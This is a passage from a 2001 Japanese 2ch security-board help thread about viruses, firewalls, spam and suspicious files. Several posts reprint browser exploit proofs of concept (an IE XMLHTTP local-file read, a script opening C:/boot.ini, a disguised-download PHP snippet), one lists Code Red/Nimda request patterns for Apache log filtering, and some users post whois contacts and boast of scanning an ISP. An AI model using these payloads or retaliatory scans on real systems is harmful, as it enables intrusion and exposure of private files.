見てみたら、有効にチェックが入っていました。m(._.)m
これが原因ですね。安心しました。あいがとう。

482 :名無しさん@お腹いっぱい。:01/12/24 09:37
>>480
飽きた。

483 :名無しさん@お腹いっぱい。:01/12/24 11:14
>>480
そのリンクを 右クリック>対象をファイルの保存>好きなテキストエディタで開く
分からなければ勉強する。

484 :474:01/12/24 13:27
本当に宜しくお願いします。
もしかして全くアホらしい事を私は聞いているのですか?

485 :名無しさん@お腹いっぱい。:01/12/24 13:37
技術的には可能

486 : :01/12/24 13:40
SHIELDS UPのPORTチェックでRPCがOPENと言われました。
これはどうやって閉じることができますか?

ファイアーウォールを入れていれば安全でしょうか?

487 :名無しさん@お腹いっぱい。:01/12/24 13:47
>>474
ネット上での振舞いは現実生活の振舞いより捕捉されやすいと思っていいよ。
絶対にどこかに足跡は残る。
海外プロバイダにして、串使って、用が済んだらパソコン捨てるくらいすれば
いいんじゃない?w

488 :474:01/12/24 14:45
プロバイダの社員が個人的にやったら犯罪?
じゃ無くてもそんな事やっていいの?
セキュリティー板だからやっぱそういうのに詳しい人
どっかの社員とか居るんじゃないの?
なんか怖くなってきたんでもう
ネットにはあまり書き込んだりしないようにします。
教えていただいてありがとう御座いました。

489 :487:01/12/24 15:11
>>474
違う意味でそのほうがいいよ。
あと病院行きな。

490 :名無しさん@お腹いっぱい。:01/12/24 15:13
>>488
なんでそんなに脅えてるの?

491 :名無しさん@お腹いっぱい。:01/12/24 15:19
>>489-490 下記参照のこと HN=207

ZoneAlarm Part3
http://pc.2ch.net/test/read.cgi/sec/1006399748/

492 :名無しさん@お腹いっぱい。:01/12/24 15:48
なんだ、やましいことがあって脅えてるだけか。自業自得じゃん。

493 :486:01/12/24 16:42
>>486教えていただけますか?

494 :擬人:01/12/24 18:05
凶悪ハッキングについてこレだろ。
http://www.puchiwara.com/hacking/

495 :名無しさん@お腹いっぱい。:01/12/24 18:46
セカンドマシンとして買う予定のNote(NEC、WindowsXP)にマカフィが
プレインストールされているようなので、アンインストールして他のものを
入れようと思うのですが、NAV2002単体+Zone Alarmという組合せで
何か問題ありますか?

メインマシンではVB2002(FW機能オフ)+Zone Alarmで問題なし、
接続はルーター経由CATVです。(またVBにしても良いんだけど、NAV
の方が少し安いので)

496 :名無しさん@お腹いっぱい。:01/12/25 05:14
>>Zoneはいいけど重い、設定できるならTiny

497 :>257:01/12/25 05:19
1

498 :名無しさん@お腹いっぱい。:01/12/25 08:28
ニュース速報板のスレ

新型ウィルス発見 今度はオフィス
http://choco.2ch.net/test/read.cgi/news7/1009233792/l50
      

499 :名無しさん:01/12/25 08:34
セキュリティと少しは関係あると思うんですが、
ZIP圧縮のファイルでPASS付きのを落としました。
PASSは「クリスマス」だと言われました。そのままカタカナで入れろ
と言われましたが、PASSを入れるとなると、カタカナもくそも
ないですよね?これはどういうことなんですかね。
わかる人いましたら教えてください。

500 :質問です:01/12/25 09:22
>>498
思わず騙されたYO!/w

昨日友人からクリスマスカードがきました。
英語のHP上にあるサンタ動画なんですが
それ以降、WINDOWSファイル内に不明のファイルがあります。
動画=不明のファイル?(54MB)と思ってみようとしたら
開くソフトを選べと出たのでアクロバットリーダーを選んでしまいました。
その後、共有が違うので開けません、が出ます。
そのファイルの拡張子は、.SWPです。
何の略でしょうか?

ウィルススキャンしても何も出ませんが、不明なファイルだけに不気味です。
他のファイルに比べて大きいし、削除しようとしてもゴミ箱に入りきらず、
もしくはプロテクトがかかっています、と出ます。
パソコンに詳しくない人はWINファイルを触るな、といわれているのですが
気になるので、このファイルを削除してもいいものかどうか教えてください。

501 :名無しさん@お腹いっぱい。:01/12/25 09:25
>>499
マルチポストはダメ

502 :名無しさん@お腹いっぱい。:01/12/25 09:35
>>500
>それ以降、
とあるけど、それ以前から存在していないと言い切れるかい?

503 :名無しさん@お腹いっぱい。:01/12/25 11:04
>>500

拡張子辞典
http://www.jisyo.com/viewer/index.html

【検索の基本を覚えるスレッド】
http://pc.2ch.net/test/read.cgi/pcqa/1008241748/1-9

☆★質問の前にこのFAQ集を見てね★☆12/12
http://pc.2ch.net/test/read.cgi/pcqa/1008114495/1-7

優しい人がレスしてくれるスレッド Ver111
http://pc.2ch.net/test/read.cgi/pcqa/1009205473/

504 :500:01/12/25 19:26
>>502-503
ありがとう!でも探したけどなかったです・・・
ヤフー検索もしてたんですが、そこにもなくダメでした。
こんなに拡張子があるなんて!

さきほどWINファイルを見ると、なぜか78MBに増えていました。
ですので、なんか一時的なファイルなのかな?????
とりあえずありがとうございました。
しばらく様子見にします。

505 :うぉっち!:01/12/25 21:17
Windows XP home で、起動後ログイン直後(音楽が流れている途中)でいきなり
ブルースクリーンが一瞬だけ出て、リブートしてしまったあと、MSに報告をしたら、
MSの報告サイトの電子証明書の有効期限が切れている警告が出ました。

とりあえず、表示されている内容を手で書き写しておきますです。打ち間違い容赦。

発行者:Secure Server Certification Authority, RSA Data Security, Inc., US
有効期限の開始:2000年12月9日
有効期限の終了:2001年12月10日 ……ゴルァ!!
サブジェクト:ocajapan.rte.microsoft.com, Windows, Microsoft, Redmond, Washington, US
公開キー:RSA(1024 Bits)

506 :うぉっち!:01/12/25 21:19
>>505
そのサイトです。ごらんくださいませ。

https://ocajapan.rte.microsoft.com/welcome.asp

507 : :01/12/25 21:29
バッドトランスBっていうウイルスに感染したようです
なんか勝手に他人にウイルス撒き散らしてるようです
どうすれば直るの?

508 :名無しさん@お腹いっぱい。:01/12/25 22:25
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_BADTRANS.B
自分でも調べろ

509 :名無し初心者:01/12/26 01:25
最近外部からワークグループ名に知らない物が、、、。

MX一度やったのですが、おそらくコレが原因と思ってますが
やめたいのですが
どうやったら削除できるのでしょうか。
クリンストしてもまた復活
どうしましょう?

510 :名無しさん@お腹いっぱい。:01/12/26 01:36
OSクリンスト

511 :安楽寺から病院へ御歳暮!:01/12/26 02:01
Internet Explorer 6 Allows Local File Reading (XMLHTTP)
http://www.securiteam.com/windowsntfocus/6W00D2K3FS.html
http://www.xs4all.nl/~jkuperus/bug.htm
<html>
<head>
<title>Exploit</title>

<scr!pt language="jscript">

function doIt() {

// open the file on the users harddisk using a http redirect

var xmlhttp = new ActiveXObject ("Microsoft.XMLHTTP");
xmlhttp.Open("GET", "servlet/RedirectServlet?fileName=c:/jelmer.txt", false);
xmlhttp.Send();

alert(xmlhttp.responseText);

}

</script>
</head>
<body>

<button onclick="doIt()">Do it</button>

</body>
</html>

512 :まー:01/12/26 02:06
質問です。
教えてくださーい!!
PINGの意味ってなんですか?
それからPINGされると結局どうなるの?
教えてくださいねー♪

513 : :01/12/26 02:10
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20011217_ms01-058
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20011204_ie55-ext-spoof
http://www.st.ryukoku.ac.jp/~kjm/test/readme.txt
<?php
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>
−−−−−
2ch でIE のセキュリティホールをつく「fusianasanトラップ」が蔓延
https://www.netsecurity.ne.jp/article/1/3581.html
http://java-house.jp/ml/archive/j-h-b/032585.html
http://memo.st.ryukoku.ac.jp/archive/200112.month/2392.html
<script>
var x=window.open('file://C:/boot.ini');
x.navigate("javascript:alert(document.body.innerText)");
</script>

514 :名無しさん@お腹いっぱい。:01/12/26 02:13
>>512
いいですよー♪
http://www.google.co.jp/search?hl=ja&q=%8E%BF%96%E2%81%40Ping%81%40%88%D3%96%A1%81%40%89%BD%81%40%82%C7%82%A4%82%C8%82%E9&lr=on&btnG=Google+%8C%9F%8D%F5

515 :ちょっとバカ:01/12/26 02:23
今、不思議なメールが来ました。
差出人のアドレスがなくて、添付ファイルがついてます。
きっと、ウィルスなんだなー。と思ったのですが、
差出人のアドレスがわからないところが不思議でした。
どういう仕組みか御存じの方がいらっしゃれば教えてください。

516 :名無しさん@お腹いっぱい。:01/12/26 02:27
>>515
まあ、Hybrisだろう。

差出人を空欄にしてメールを出している。
もはや疑問の余地もないほどに単純明快だけど?

517 :ちょっとバカ:01/12/26 02:30
あー?そうかー。
516さんありがとうー。

518 :名無しさん@お腹いっぱい。:01/12/26 02:53
以前ケーブル接続にしたとたん、
ISPからportスキャン掛けられ、rootで入ろうとしてきた。
もちろんport変えて上げてるapacheもばればれ、、。
ISP曰く「どんなサービスを上げてるか把握するため」だって、、
ISPって所詮そんな物?

WANに向けて空けてる俺も悪いが、、、、

519 :名無しさん@お腹いっぱい。:01/12/26 03:01
vipw root:*:すれば安心
portスキャンは仕方ないけど、いきなりrootってやだね。分かるけど。

520 :518:01/12/26 03:24
>>519
vipw うんぬんはしてるけどね。
rootノンpassかと思ったのだろうか?
一応ISPに文句は言ったけどね。

521 :ううう:01/12/26 04:45
>>518
ちなみにどこのプロバイダー?

522 :名無しさん@お腹いっぱい。:01/12/26 04:58
>>518
「どんなサービスを上げてるか把握するため」って凄い言い訳ですね。
そのようなプロバイダは信用できません。
第一ISPとしての守秘義務を忘れているのでは?
もし顧客を把握したいなら申告してもらうか、
予め告知をするのが最低限のルールってものです。
どこですか、その酷いプロバイダは?

523 :名無しさん@お腹いっぱい。:01/12/26 05:26
>>521
>>522
地方の某電力系のISPです。
私はそのISPへルーターPCをケーブル接続24時間繋いでるので
文句もほどほどにしてます。
でも、dhcpcでもらったドメインと別だかえら
(営業はCATV会社保守はそのISP)
とりあえず、そのISPのドメインからのパケットは蹴ってます。

しかし、自分の所の客なのによくやるわって思う。
Winな端末入れてる人は気づいてないのかな?

余談だけど、別件で警察の「生活安全課」と話してた時
この件聞いたけど、「聞いたこと無い、弁護士と相談して」だって
こんなものか、、、

524 :ううう:01/12/26 05:38
>>523

ISP名はっきりさらしていいと思うが

でわそのプロバイダの言葉をひっくり返すならば
ISPがどんなサービスやってるかをさぐる為ポートスキャンしまくり
rootでトライトライでくらっキング大会してもいいわけですね
そのISP内は、、わりと楽しそうだのう。

525 :522:01/12/26 06:22
>>523
うううさんが言うように、そのISPを公表してもいいと思いますよ。
ただパケットもドロップしているし、
気にならないのであれば無視するしかないのかもしれません。
ここら辺のことで国民生活センターが動くとも思えませんし・・・
http://www.kokusen.go.jp/

2ちゃんねるに公表して、プロバイダに姿勢を正させるのもひとつかな。

526 :名無しさん@お腹いっぱい。:01/12/26 06:28
>>524

# whois stnet.co.jp
[ JPNIC database provides information on network administration. Its use is ]
[ restricted to network administration purposes. For further information, use ]
[ 'whois -h whois.nic.ad.jp help'. To suppress Japanese output, add '/e' at ]
[ the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Domain Information: [ドメイン情報]
a. [ドメイン名] STNET.CO.JP
e. [そしきめい]
f. [組織名] 株式会社 四国情報通信ネットワーク
g. [Organization] Shikoku Information & Telecommunication Network Co.,Inc.
k. [組織種別] 株式会社
l. [Organization Type] Corporation
m. [登録担当者] YK235JP
n. [技術連絡担当者] TK2142JP
p. [ネームサーバ] ns1.stnet.ad.jp
p. [ネームサーバ] ns2.stnet.ad.jp
y. [通知アドレス] stcn-adm@stnet.ad.jp
[状態] Connected (2002/03/31)
[登録年月日] 1996/02/07
[接続年月日] 1996/02/08
[最終更新] 2001/03/28 12:21:35 (JST)
khashikawa@stnet.ad.jp

こいつです。

527 :523:01/12/26 06:46

# whois netwave.or.jp
[ JPNIC database provides information on network administration. Its use is ]
[ restricted to network administration purposes. For further information, use ]
[ 'whois -h whois.nic.ad.jp help'. To suppress Japanese output, add '/e' at ]
[ the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]

Domain Information: [ドメイン情報]
a. [ドメイン名] NETWAVE.OR.JP
b. [ねっとわーくさーびすめい] ねっとうぇーぶいんたーねっとさーびす
c. [ネットワークサービス名] Netwaveインターネットサービス
d. [Network Service Name] Netwave Internet Services
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] SN3365JP
n. [技術連絡担当者] YI122JP
n. [技術連絡担当者] HH404JP
p. [ネームサーバ] ns1.netwave.or.jp
p. [ネームサーバ] ns1.iij.ad.jp
p. [ネームサーバ] ns1.stnet.ad.jp
y. [通知アドレス] admin@netwave.or.jp
y. [通知アドレス] stcn-adm@stnet.ad.jp
[状態] Connected (2002/03/31)
[登録年月日] 1996/02/23
[接続年月日] 1996/03/19
[最終更新] 2001/10/30 10:52:39 (JST)
form@domain.nic.ad.jp
#

こいつが、>>526の下流。
526にやられた、、、。

528 :ううう:01/12/26 07:35
>>523

その会社のweb serverポートスキャンしたらわりとニヤリ
顧客のポートスキャンする前に自分んとこもっとしっかりやれ厨房って感じ
このSolarisいつまでつかうかねぇ。

529 :ううう:01/12/26 07:39
>>526
528はnetwaveだけど。
stnetはIISっぽいなしかも3.0とか古いやつ。
つか両者ともダメコンボでしょう。
528はしっかりしてるからイイんじゃねーのー。

530 :名無しさん@お腹いっぱい。:01/12/26 07:47
攻撃できるもんならやってみな _s-hiromi-1201@msg.biglobe.ne.jp

531 :名無しさん@お腹いっぱい。:01/12/26 07:50
>>530 遊んでないで冬休みの宿題やれ。

532 :523:01/12/26 08:34
>>528
地元では有名なセキュリティーが甘い業者。。。
以前ハクられて、某HPに顧客のアカウントとPassが
出た事あったような、、、2-3年前だけど。

533 :ううう:01/12/26 09:28
>>532
結論として、523は己の道を行け、厨房ISPは自滅すれ
自滅の手伝いは523が2chですれば良いという事か。

534 :500ISE:01/12/26 18:56
http://www.asahi.com
朝日新聞社 クラッキングされた?

535 :名無しさん@お腹いっぱい。:01/12/26 19:02
>>534 はぁ?

536 :名無しさん@お腹いっぱい。:01/12/26 19:39
211.239.89.237 - 192.168.0.*** 80 GET /scripts/root.exe /c+dir 403 -
毎日毎日こんなのが現れてうざったくてしょうがない
のですが、何か対策ないですか?

537 :ううう:01/12/26 19:49
>>536
APACHEか?
APACHEだったら httpd.confでlogを切り分けろ

SetEnvIf Request_URI default\.ida code-red
SetEnvIf Request_URI default\.ida bad_log
SetEnvIf Request_URI cmd\.exe iis_cmd
SetEnvIf Request_URI cmd\.exe bad_log
SetEnvIf Request_URI root\.exe iis_root
SetEnvIf Request_URI root\.exe bad_log

CustomLog /usr/local/apache/logs/access_log common env=!bad_log
CustomLog /usr/local/apache/logs/codered_log common env=code-red
CustomLog /usr/local/apache/logs/iis_cmd_log common env=iis_cmd
CustomLog /usr/local/apache/logs/iis_root_log common env=iis_root

538 :名無しさん@お腹いっぱい。:01/12/26 20:00
>>537
う〜ん、IISなんです。
最近はこんなLOGのほうが多いくらいで・・・

539 :ううう:01/12/26 20:05
IISは知らないのだが
/scripts に root.exeというアプリ作って
そのつどrouterのblock IPに追加させるようにしとくとか
どうよ。

540 :名無しさん@お腹いっぱい。:01/12/26 20:14
なるほど、ルータでブロックですか。
でも、馴れないことして正規のものまで
ブロックってのが怖くて、なかなか・・・
じっくりルータの取り説でも読んでみます。

541 :名無しさん@お腹いっぱい。:01/12/26 21:01
>>540
へ?
root.exeに正規のアクセス??

542 :名無しさん@お腹いっぱい。:01/12/26 21:52
ちがう、ちがう。
設定をミスってブロックしなくてもいいもの
までもって事。
なにせ沢山のIPが入り込んでいるから全部
追加ってことだとかなりの数になるし。

543 :ううう:01/12/26 22:03
IISは知らないが
リスクを負いたくなければ
IISでもログの切り分けぐらいできるんじゃないの?
もしダメだったらログを回すときにスクリプトかませて
ニムダ系のやつをカットしてしまえばいいんじゃないかね

バーチャルホストでログが別途で出きるんだったら
やつらはIPでhttp引きに来るからその分をバーチャルにしてしまえば
問題ないと思うのだが。

544 :名無しさん@お腹いっぱい。:01/12/26 22:18
うううさん、いろいろ親切にどうも。
やっぱりログの整理でやってみます。
ルータでブロックってのもいいかと思ったのですが
やっぱりいじらないでおきます。
なにかIIS用のいいログ整理ソフトでもないか
ベクターにでも行って探してみます。

545 :うぇw:01/12/27 02:21
■□■□■□■□■□■□■□■□

荒らし依頼所


http://www2.aaacafe.ne.jp/free/kgy999/main.bbs


あなたのHPも依頼されてるかも(笑)

■□■□■□■□■□■□■□■□


l@@l@n opppo

546 :教えてください。:01/12/27 11:16
昨日からセキュ板に入るとマカフィーが作動。
「JS IE/START」(昨日)と
「VBS Generic@MM」(今日)に感染しています。
駆除→駆除できないので削除しました。
ちなみにインターネット一時ファイルを全削除してから
スキャンかけると何も出ない。
シマンテックのオンラインスキャンは、Dドライブのゴミ箱
ファイルで止まってしまうので、それ以降のファイルはスキャンできない。
(cは大丈夫みたいです)

ここのどこかにウィルスをしまっている?ってこと?
それともマカフィーが誤作動?気になるので教えてください。
(ちなみに他板ではありません)

547 :名無しさん@お腹いっぱい。:01/12/27 12:32
>>546
「VBS_GENERIC」のウイルス名は特定ウイルスの検出を意味するものではありません。使用中のパターンファイルでは対応されていないウイルスの危険性があるVBスクリプトのプログラムが発見されたことを示します。
したがって、このウイルス名でのウイルス検出には以下の3通りの可能性があります

1)今までに発見されていない新種、変種、亜種のVBSウイルスの検出
2)実際には不正な活動ではないがウイルスと似た動きが認められるVBSコードに対する検出(誤警告)
3)VBスクリプトと似た文法を持つ、VisualBasicのソースコードやVBA(VisualBasic for Application)のマクロコードに対する検出

548 :名無しさん@お腹いっぱい。:01/12/27 12:54
>>545
その無料掲示板の規約にはアングラサイト使用禁止と
あるので、サポートにメルしといた。

549 :名無しさん@お腹いっぱい。:01/12/27 19:02
家に帰ってPC見てみると、ノートン先生の
「トロイの木馬の攻撃をブロックしました」
とかってゆーウインドウがあってビックリ。
で、IPから調べてみたら韓国のISPでした。
なんかやられっぱなしもシャクなんで、メールでも送りたいのですが
どんな文面で抗議すればいいんでしょうか?
抗議メール用のひな形みたいなモノとかあったら教えてください。

550 :名無しさん@お腹いっぱい。:01/12/27 19:08
>>549 今度はウィルス付きなのが送られてくるぞ。スキルが無いのならやめておけ。

551 :名無しさん@お腹いっぱい。:01/12/27 19:19
>>550
ううう。じゃコタツに入って泣きながらミカンでも食べてます。
ありがとうございました。

552 :名無しさん@お腹いっぱい。:01/12/27 19:46
>>549
検索すればそれなりに出てきたが。

>>550
ISPに対しての抗議だからそんな事はまず無いと思われ
まさか直接相手のメアドが分かるハッカーなら別だが(w

553 :名無しさん@お腹いっぱい。:01/12/27 20:33
>>552 まーな。しかしISPもピンキリ、ましてや韓国だからな。

554 :2チャンねらら:01/12/27 21:44
2ch型掲示板にはどれぐらい穴がありますか?
あったら教えてください。
下にリンクがあります。
おしえてけろ。kk

2ch型マイナー掲示板「はにちゃんねる」
http://www.isn.ne.jp/~honey/honeychannel/
みんなリンク&紹介よろしく。

555 : :01/12/27 21:56


556 :名無しさん@お腹いっぱい。:01/12/27 22:12
>>554
宣伝うざ

557 :名無しさん@お腹いっぱい。 :01/12/27 22:28
今日メールが着ていて、それに添付されてたファイルを開いてしまったら
ウィルスに感染してしまいました。PCにインストールされているノートンのver5.0
で除去しようとしてもなぜかできません。検疫、修復もです。そのファイルを普通に
削除しようとしたら「WINDOWSで使用しているので削除できない」っとなってしまいます。
ウィルスはの種類はBadtransで
OSはWIN98SEです
よろしくお願いします。

558 :名無しさん@お腹いっぱい。:01/12/27 22:30
>>557
正確な削除の仕方はトレンドマイクロやシマンテックのサイトに載ってる。

559 :名無しさん@お腹いっぱい。:01/12/27 22:31
突然クリスマスカードですと言って下記の内容の
カードが届きました・・・・危険でしょうか?
アドバイスお願いします

Dear Sirs,

We are glad to congratulate you with the birthday of His Imperial Majesty
Akihito! We'd like to join the people of Japan in their happiness - we know
that Princess Toshi - a new ray in the Country of Rising Sun was born!

We wish Her Imperial Highness the Princess to be safe and sound. We wish
ever lasting prosperity to your country and people!

With great respect,
administration of "Russian Information Network

560 :名無しさん@お腹いっぱい。:01/12/27 22:36
>>550>>552>>553
>「トロイの木馬の攻撃をブロックしました」
これって、一つのポートに対してSYNパケットが来ただけでしょ?
そんなんで抗議してたら、藪を突ついてなんとやら…ですよ。

561 :名無しさん@お腹いっぱい。:01/12/27 22:40
>>559
炭疽菌に注意しなさい

562 :名無しさん@お腹いっぱい。:01/12/27 22:42
>>561さん マジですか?

563 :名無しさん@お腹いっぱい。:01/12/27 22:46
>>560 ? レス先が間違って無いか?

564 :名無しさん@お腹いっぱい。:01/12/27 22:50
シマンテックのサイトには「W32.Badtrans.13312@mm. として検知されたすべてのファイルを削除してください。」と
かかれていたのですがW32.Badtrans.B@mmに感染しているKernel32.exeとkdll.dllのファイルがどうしても
削除できません(Kernel32.EXEはWINDOWSが使用中、kdll.dllはライトプロテクト)

565 :557:01/12/27 22:51
すいません↑は557です

566 :名無しさん@お腹いっぱい。:01/12/27 22:57
>>559
添付ファイルがあれば怪しいね。
でもいい英文だね。

567 :名無しさん@お腹いっぱい。:01/12/27 23:06
>>564
こっち↓
http://www.symantec.com/region/jp/sarcj/data/w/w32.badtrans.b%40mm.html

568 :名無しさん@お腹いっぱい。:01/12/27 23:06
>>566
お返事ありがとうございます。英語わからなくて。。意味は
いまいち不明なんですけど。最初に来たメール今探してみますので
もう一度アドバイス頂けるとうれしいです。 559

569 :557:01/12/27 23:20
>>567
すいません似たような名前で間違っていました。
なんとか駆除できました。
どうもありがとうございました。

570 :名無しさん@お腹いっぱい。:01/12/27 23:32
掲示板の管理PASSを見つけるツールはありますか?

571 :名無しさん@お腹いっぱい。:01/12/27 23:36
>>570 あったらどうしようというのだ?つまらん事聞くな。

572 :名無しさん@お腹いっぱい。:01/12/27 23:49
>>568
アイボ… じゃなくて愛子様(だっけ?名前憶えてないやい)についての
お祝いメッセージのようですね…

メッセージ部分の危険度は天皇制に洗脳されるぐらいのことです。

573 :名無しさん@お腹いっぱい。:01/12/27 23:59
>>570
あるんではないかい、場所は知らん。
でもそんなもん使うと、掲示板CGIとかに負荷掛けそうだからそれだけでもヤバイ
事になるかも…

574 :名無しさん@お腹いっぱい。:01/12/28 00:24
http://kaba.2ch.net/test/read.cgi/net/1009458920/
ネトヲチでこんなスレが立ってるけど、携帯メールのUIって盲点だったかも。
漏れは携帯持たないんで確認できんのだが、Reply-Toつけられた時に誰に送ろうとしているか
はっきりわかるUIになってるかい?
*

575 :名無しさん@お腹いっぱい。:01/12/28 00:32
スレ違いかもしれませんが教えてください。

知人から聞いた話なのですが、
うちは、CATVでのインターネットで
172.16.35.*** というIPが割り当てられています。
これはローカルだと思うのですが、

私が、グローバルをとらないと鯖をたてれないかときいたら、
いまのルータは仮想のグローバルを作って鯖がたてれるという
話を聞いたのですが、果たしてルータでできるのでしょうか?

詳しいお方いらっしゃいましたら教えてくださいませ。

576 :559:01/12/28 00:33
>>566様 >>572
来たメールがこういうので当然だったので。。。
その後ノートンが感染の可能性がありますと
警告を出し、ウィルスチェックは終わったのですが
問題ないみたいな表示になりました。
DMだったのかも知れず質問してしまいすいませんでした。
回答ありがとうございました>>572

チェックに時間がかかってしまってすいませんでした

届いたメール↓
Hello,
You have received a postcard from http://postcards.rin.ru

You can see it here:
RECEIVE
http://postcards.rin.ru/postcards/post/imp.html
A postcard will be kept 1 mounth

Virtual postcards on POSTCARDS.RIN.RU
We invite you to visit Russian Information Network

577 :名無しさん@お腹いっぱい。:01/12/28 00:34
最近3kの添付がついた英文のメールを受け取るのですが、
これはウイルスなのでしょうか?
バスターにもひっかからないし、
中身が知りたいのですが開けるわけにもいかないので。

本文は開けずに削除してしまっているので貼ることはできないのですが…
ご存知の方いらっしゃったら教えてください。

578 :名無しさん@お腹いっぱい。:01/12/28 01:15
スタンドアローンのPCを用意して開けてみる。

579 :名無しさん@お腹いっぱい。:01/12/28 03:02
>>577
MAILER-DAEMONからって事はない?

580 :577:01/12/28 04:25
>579
うわ・・・そうかもしれません・・・
というかそれっぽい・・・
次にそのメールが来たらがあればきちんと確認します。
本当にありがとうございました。

581 :名無しさん@お腹いっぱい。:01/12/28 04:52
>>580
もしそうなら安心していいよ。
俺も添付ファイル付きで
MAILER-DAEMONから受け取った事あるし。

これも参考にして。
http://www.void.tako.org/mail/address.html

582 :ロシアも資本主義化してるんですなぁ…:01/12/28 05:42
>>576
http://postcards.rin.ru/postcards/post/imp.html

を見に行って下のsend postcardってボタンを押せばポストカードの選択画面に
行きますからこりゃ上記のサイトの宣伝メール(spam)というやつですな。
only your textって言うやつを選べば独自の文章を送れそうですが、
日本語は文字化けせずに送れるかは怪しいのではないかと思います。
ついにロシアからspamが来るようになったか…

583 :名無しさん@お腹いっぱい。:01/12/28 05:45
>>580
メールのソースを見てみるともう少し事情がつかめるかも

584 :546:01/12/28 08:42
>>547
どうもありがとうございました。
今日は無事何事もなく来れました。
新ウィルス?ではなく、2か3の可能性がありそうですね。
詳細がわかりませんが、気をつけつつ使うことにします。
ウィルス&セキュ板に来てから、ものすごく勉強している気がします。
ここに来られないだけで不安がありましたし(w メーカーのサポートは×)
ありがとうございました<ALL

585 :名無しさん@お腹いっぱい。:01/12/28 10:12
>>584

結論からいうとウイルスのソースを書いたスレッドがそこかしこに
あるのでそれに引っ掛かってるだけ。

586 :名無しさん@お腹いっぱい。:01/12/28 12:00
sygateをいれたら、桜時計が使えなくなってしまったんですけど、
どうすればいいんですか?

587 :559:01/12/28 12:15
>>582様 ありがとうございました

588 :初心者007:01/12/28 14:52
アンチウィルスソフト会社がウィルスをばらまいている可能性はないのですか。
アンチソフトを導入せずに、ウィルスに対処する方法を教えてください。

589 :名無しさん@お腹いっぱい。:01/12/28 14:57
>>588
無いとは言い切れないが、可能性は極めて薄いだろうな。
外部と接続・接触しない。完全スタンドアローン化。完全フォーマット。

590 :名無しさん@お腹いっぱい。:01/12/28 19:33
>>586
自分の桜時計で使うUDPポートを空けておけ。

591 :名無しさん@お腹いっぱい。:01/12/28 19:48
>>588
OS作ってる会社がトロイ仕込んでる可能性も否定できないのでOSも自分で作れ。
コンパイラも怪しいコードを出す可能性もあるからハンドアセンブルでモニタ焼くところ
から始めるんだぞ。
おっと、CPUにも何か仕込まれてるかも知れないからトランジスタ1000万個くらい
買ってきてCPUも自作しないと…

592 :名無しさん@お腹いっぱい。:01/12/28 19:57
>>591 >>588はマッチポンプの事を言っているのだと思われ。

593 :名無しさん@お腹いっぱい。:01/12/28 21:25
題名は無くて、Received: from oemcomputer (oemcomputer)ってとこから
添付「MIPMLPMI.EXE」がついてくるメールが着たんですが
これって何のウイルスですか?

594 :名無しさん@お腹いっぱい。:01/12/28 21:39
>>593
Hybrisじゃないの?

http://hpcgi1.nifty.com/~naotosi/zatubun.pl?s=7&b=50
http://www.ipa.go.jp/security/y2k/virus/cdrom/topic/2_13.html

595 :593:01/12/28 21:48
サンクス。あとでコレクションに入れときます。

596 :名無しさん@お腹いっぱい。:01/12/29 02:46
>>588
>アンチウィルスソフト会社がウィルスをばらまいている可能性はないのですか。

MicrosoftがアホなOS作りすぎるので、アンチウイルスメーカーがそこまでする必要は
ないと思われ

597 :871@くだ質v212:01/12/29 03:02
↑から来ました
VirusScan ってあちこちで叩かれてるけど、漏れはここ数年問題が発生したことはない。
ちなみに NT4.0→W2K 環境。

・ウイルスバスター、ノートン=95/98/Me用
・マカフィー=W2K用

ってことでよろしいか?
あまりにマカフィーが叩かれてるので本当に技術的に問題ありなら
乗り換えようと思っているが単に厨房が騒いでるだけのような気もするので
誰か本当のとこ教えてください。

598 : :01/12/29 10:57
未だに思い出したようにRe:だけのメールが来るのが、
週末、冬休み時期、年末年始休暇、のタイミングなことが分かった。
俺のサイトも新規に見てくれる人がいるんだなあ、と素直に…
喜べないよ。

>>597
マカフィーはプリインストールが多かったし、
そんでもってアップデートでつまづくようなことをやり、
結局のところ買い直せみたいなことをやっていたんだから、
悪くいわれる要素はあると思うよ。
やっぱそういうので、企業体質とかうかがえるでしょ?
一概に「単に厨房が騒いでいるだけ」と決めつけるのも
どんなもんかと。

599 :871@くだ質v212 :01/12/29 14:05
>>598
あ、そゆことね。
あんまり叩かれてるもんだから技術的に何か不具合があるのかと思てたよ。
アナログな要素での問題なのね。
#まぁアップデートができない云々は技術的な不具合か。。。

別に決め付けてたわけじゃないよ。だからここで確認しようと思ったの。

600 :名無しさん@お腹いっぱい。:01/12/29 14:05
webpdp_fsg_1050.exe
「webpdp_fsg_1050.exeってのがWin起動時に接続しようとするんですけど
こいつはいったい何なんでしょうか・・・」

前の書き込みにもあったけど(198)私も知りたいです。
レスには「その名前で自分のPC内検索してプロパティ見ろよ」って、
書いてありましたが、筆問の意味を理解してないみたいで、
よく分かりません。

ファイル説明は .
正式ファイル名は Trickler.exe
なっております。もしお分かりの方、教えてください。
一体なんなのか。

601 :名無しさん@お腹いっぱい。:01/12/29 14:17
>>600
FWで警告
   ↓
ファイルの検索
   ↓
プロパティを見る
   ↓
ファイルの正体がわかる
   ↓
googleで検索
   ↓
用語等わからなかったら自分で調べる
   ↓
それでもわからない場合にカキコする

602 :名無しさん@お腹いっぱい。:01/12/29 14:50
はい、それをして分からなかったから、書き込んでいます。
Trickler.exe
これも、すべて英語なので・・日本語では引っかからない(google)
そして、webpdp_fsg_1050.exe これも唯一日本語検索で引っかかたが、
このサイトでした?
で、書き込んだのですが。
あなたは、そういった事情を知らずにそんなこと書いてるの?
私は、このファイルの正体がしりたいだけなのです。
くだらない事は、いいのです。
まぁ、英語を読めない私が悪いのかもしれないけど。

603 :名無しさん@お腹いっぱい。:01/12/29 15:03
>英語を読めない私が悪いのかもしれないけど。
うん、お前が悪い。

604 :名無しさん@お腹いっぱい。:01/12/29 15:05
>>602 何かのスパイウェアじゃないのかなぁ?

名前を変えてみて不都合が出なければ削除でいいような気がする。

605 :603:01/12/29 15:09
うん、googleでパッと見る限り多分スパイウェア。

606 :名無しさん@お腹いっぱい。:01/12/29 15:17
>>602
>用語等わからなかったら自分で調べる
ここには辞書を引くとかも含まれるのでは?

607 :名無しさん@お腹いっぱい。:01/12/29 15:23
>>602
